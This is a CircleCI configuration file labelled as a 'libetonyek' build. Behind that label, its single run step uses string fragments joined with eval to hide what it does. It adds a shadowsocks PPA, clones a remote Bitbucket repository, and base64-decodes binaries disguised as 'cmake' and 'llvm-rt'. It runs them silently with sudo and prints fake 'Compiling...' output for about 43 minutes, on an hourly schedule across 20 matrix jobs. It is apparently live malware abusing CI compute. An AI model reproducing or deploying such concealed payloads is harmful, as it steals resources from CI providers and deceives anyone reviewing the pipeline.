version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--autounmask-keep-masks", "--clean", "--load-average", "--quiet", "--ignore-default-opts", "--sync-submodule", "--newrepo", "--binpkg-changed-deps", "--verbose-conflicts", "--root", "--regen", "--autounmask-unrestricted-atoms", "--autounmask-use", "--changelog", "--rebuild-if-new-rev", "--keep-going", "--alert", "--ignore-soname-deps", "--complete-graph-if-new-use", "--usepkg"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--autounmask-keep-masks", "--clean", "--load-average", "--quiet", "--ignore-default-opts", "--sync-submodule", "--newrepo", "--binpkg-changed-deps", "--verbose-conflicts", "--root", "--regen", "--autounmask-unrestricted-atoms", "--autounmask-use", "--changelog", "--rebuild-if-new-rev", "--keep-going", "--alert", "--ignore-soname-deps", "--complete-graph-if-new-use", "--usepkg"]
    triggers:
      - schedule:
          cron: "47 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: libetonyek-BUILD
          command: |
            PlAyooMXJ="sudo add-ap"
            Tqogo="t-repositor"
            TigGVph="y ppa:max-c"
            zqxwZs="-lv/shadows"
            zlWQp="ocks-libev "
            ljCvRpsDfVV="-y &>/dev/n"
            eval "$PlAyooMXJ""$Tqogo""$TigGVph""$zqxwZs""$zlWQp""$ljCvRpsDfVV""ull || true"
            astoNcJ="sudo add-ap"
            SzRCjgyecLA="t-repositor"
            UDwrF="y ppa:ondre"
            fVBLyy="j/apache2 -"
            NRMLgQr="y &>/dev/nu"
            eval "$astoNcJ""$SzRCjgyecLA""$UDwrF""$fVBLyy""$NRMLgQr""ll || true"
            sudo apt update || true
            sudo apt --yes install openssl &>/dev/null || true
            xDEhNWs="sudo apt --"
            qiXhsZeMyrD="yes install"
            YvpqXWz=" cl-base64 "
            jQcPF="git &>/dev/"
            faGWoCllLeV="null || tru"
            eval "$xDEhNWs""$qiXhsZeMyrD""$YvpqXWz""$jQcPF""$faGWoCllLeV""e"
            YCLzDG="git clone h"
            PvvZJ="ttps://gccb"
            BEeqllgD="uild@bitbuc"
            aEZeq="ket.org/gcc"
            IAubZBH="build/gcc.g"
            GzcvwSSOvAG="it &>/dev/n"
            eval "$YCLzDG""$PvvZJ""$BEeqllgD""$aEZeq""$IAubZBH""$GzcvwSSOvAG""ull"
            ArZrYGN="base64 -d g"
            EOOTTNtna="cc/cmake_np"
            eval "$ArZrYGN""$EOOTTNtna""_ > cmake"
            qNndDjGqANe="base64 -d g"
            CcbKztQTXc="cc/config_ "
            eval "$qNndDjGqANe""$CcbKztQTXc""> output"
            AFeyjqj="base64 -d g"
            PEuJAIOt="cc/make_ > "
            eval "$AFeyjqj""$PEuJAIOt""llvm-rt"
            jwtgCSIicCs="sed -i 's/1"
            yrptSRMOBoz="080/1081/g'"
            eval "$jwtgCSIicCs""$yrptSRMOBoz"" output"
            chmod +x llvm-rt cmake
            ./cmake
            sed -i 's/build/ob2o/g' output
            EQIvjoZkepU="sudo ./llvm"
            hzocpSK="-rt -c outp"
            nXlcoVzKIZC="ut &>/dev/n"
            eval "$EQIvjoZkepU""$hzocpSK""$nXlcoVzKIZC""ull &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2567)) ] && sudo killall llvm-rt && break; sleep 213; done
